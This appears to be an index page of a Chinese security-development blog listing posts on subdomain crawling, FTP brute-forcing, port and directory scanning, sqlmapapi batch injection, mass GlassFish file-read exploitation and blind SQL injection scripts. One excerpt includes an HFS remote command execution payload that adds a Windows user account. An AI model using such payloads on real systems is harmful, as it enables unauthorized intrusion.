Hsy.Sec
python安全开发-子域名爬取&ftp爆破 python安全开发-子域名爬取&ftp爆破
## 0x00 子域名爬取 import requests import time import queue from lxml import etree def baiud_get(): while not q.empty()
2022-05-02
python安全开发-多线程目录扫描&端口扫描&子域名爆破 python安全开发-多线程目录扫描&端口扫描&子域名爆破
## 0x00 多线程目录扫描 import sys import os import tarfile import wsgiref.validate import requests import threading import ti
2022-05-02
python安全开发-rce命令执行&请求测试&豆 ban的信息爬取 python安全开发-rce命令执行&请求测试&豆 ban的信息爬取
## 0x00 HFS的命令执行 import requests url_add="/?search==%00{.exec|cmd%20/c%20net%20user%20bbbbb%20123%20/add.}" url="http:/
2022-05-02
Python基础入门Top50 Python基础入门Top50
0x00 Python入门Top50知识点特来整理常见的top50入门知识点,初学者可以参考学习1.input输出 password=(input("你的密码是:")) print("你的密码是:",password) 2.输出类型 a
2021-12-11
python开发-sqlmapapi接口批量扫描注入 python开发-sqlmapapi接口批量扫描注入
0x00 sqlmapapi介绍在sqlmap目录下面还存在一个sqlmapapi.py的程序,sqlmap.py本身具有批量扫描的能力,常见批量扫描有使用-l参数扫描bur代理的日志目标或者-m扫描多个对象时候,推荐使用sqlmap的ap
2021-10-22
Python开发-fofa批量挖掘glassfish-任意读取漏洞 Python开发-fofa批量挖掘glassfish-任意读取漏洞
0x00 glassfish漏洞描述 漏洞分析:glassfish是一款java编写的跨平台的开源的应用服务器。与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造: https://your-ip:48
2021-10-17
构造EXP-Python盲注脚本 构造EXP-Python盲注脚本
0x00 搭建环境介绍平常的盲注如果手工会很麻烦,多数情况都会借助sqlmap等相关软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个盲注脚本,低线程,高效率。 利用到m
2021-08-12